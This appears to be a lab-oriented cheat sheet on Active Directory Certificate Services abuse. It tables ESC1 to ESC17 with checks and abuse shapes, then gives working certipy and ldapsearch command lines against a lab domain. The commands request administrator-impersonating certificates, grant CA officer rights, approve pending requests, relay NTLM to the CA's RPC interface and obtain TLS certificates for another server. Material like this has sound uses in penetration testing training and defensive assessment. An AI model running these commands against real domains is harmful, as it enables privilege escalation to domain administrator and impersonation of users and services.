| ESC | Name | Core issue | First check | Abuse shape |
|---|---|---|---|---|
| ESC1 | Enrollee-supplied subject for client authentication | Requester can supply UPN/SAN on an authentication template | certipy find -vulnerable -enabled | Request cert as target user and authenticate |
| ESC2 | Any Purpose or no EKU template | Certificate can be used for multiple purposes, including agent-style abuse | Any Purpose : True or empty EKU | Request flexible cert, then chain into ESC3-style on-behalf-of request |
| ESC3 | Certificate Request Agent | Low-privileged user can enroll for an enrollment-agent certificate | Enrollment Agent : True | Request agent cert, then request cert on behalf of target |
| ESC4 | Template hijacking | Attacker can modify template ACLs or sensitive template attributes | User ACL Principals on template | Rewrite template into ESC1-style state, enroll, restore |
| ESC5 | Vulnerable PKI object ACLs | Attacker can modify PKI trust objects in the Configuration naming context | ACL review under CN=Public Key Services | Modify NTAuth, AIA, CDP, OID, or related PKI trust objects |
| ESC6 | CA allows SAN specification through request attributes | CA-level SAN injection is enabled | User Specified SAN : Enabled | Usually chain with ESC9 or ESC16 and request cert with target UPN/SID |
| ESC7 | Dangerous CA permissions | Attacker has Manage CA or related CA control rights | CA access rights in Certipy output | Add officer, enable templates, approve requests, or reach CA key abuse |
| ESC8 | NTLM relay to ADCS web enrollment | Web enrollment accepts relayed NTLM without effective EPA/channel binding | Web Enrollment and Channel Binding in CA output | Relay coerced NTLM to /certsrv/ and request cert |
| ESC9 | No SID security extension on template | Template omits szOID_NTDS_CA_SECURITY_EXT | NoSecurityExtension enrollment flag | UPN manipulation or ESC6 chain to impersonate target |
| ESC10 | Weak Schannel certificate mapping | Server allows weak UPN mapping for Schannel client cert auth | Registry and Schannel mapping review | Change UPN on controlled account, enroll cert, authenticate through LDAPS |
| ESC11 | NTLM relay to ADCS RPC interface | CA does not enforce encrypted RPC certificate requests | Enforce Encryption for Requests : Disabled | Relay coerced NTLM to rpc://CA and request cert |
| ESC12 | YubiHSM2-specific CA key exposure context | Local access to CA plus vulnerable HSM software stack | CA host and HSM review | Abuse HSM software weakness to use or expose CA signing capability |
| ESC13 | Issuance policy linked to group | Issued certificate maps to an OID linked to an AD group | certipy find -oids | Request cert and receive group SID through issuance policy |
| ESC14 | Weak explicit certificate mapping | Weak altSecurityIdentities mapping on account | LDAP search for altSecurityIdentities | Obtain matching certificate and authenticate as mapped account |
| ESC15 | EKUwu, CVE-2024-49019 | Unpatched CA accepts injected Application Policies on V1 templates | V1 template, subject supply, patch state | Inject Client Authentication policy during request |
| ESC16 | CA globally disables SID security extension | CA omits SID extension from all issued certs | Disabled extension OID on CA | Same abuse shape as ESC9 across templates issued by that CA |
| ESC17 | Enrollee-supplied subject for server authentication | Requester can supply DNS SAN on server-auth template | Server Authentication plus subject supply | Request cert for target server name and impersonate TLS service |
ESC6 with ESC9 or ESC16
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC9 -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -out administrator
certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
ESC7 officer and approval pattern
certipy ca -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -add-officer student
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template SubCA -upn administrator@ootw.local -out administrator
certipy ca -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -issue-request <REQUEST_ID>
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -retrieve <REQUEST_ID> -out administrator
ESC11 relay
certipy relay -target 'rpc://10.10.10.200' -ca 'OOTW-CA' -template DomainController
ESC13 OID review
certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -oids -enabled -stdout
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template SecureAdminsAuthentication -out student_policy
certipy auth -pfx student_policy.pfx -domain ootw.local -dc-ip 10.10.10.200
ESC14 weak explicit mappings
ldapsearch -LLL -x -H ldap://10.10.10.200 -D 'ootw.local\student' -w 'student' -b 'DC=ootw,DC=local' '(altSecurityIdentities=*)' sAMAccountName altSecurityIdentities distinguishedName
ESC15 application policy injection
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template WebServer -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -application-policies 'Client Authentication' -out administrator
ESC17 server-auth request
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template WebServer -dns wsus.ootw.local -out wsus
Notes
These entries are a field matrix, not a replacement for validating prerequisites. Several modern ADCS abuses only become exploitable when combined with mapping mode, patch state, template version, CA flags, or a second AD control primitive.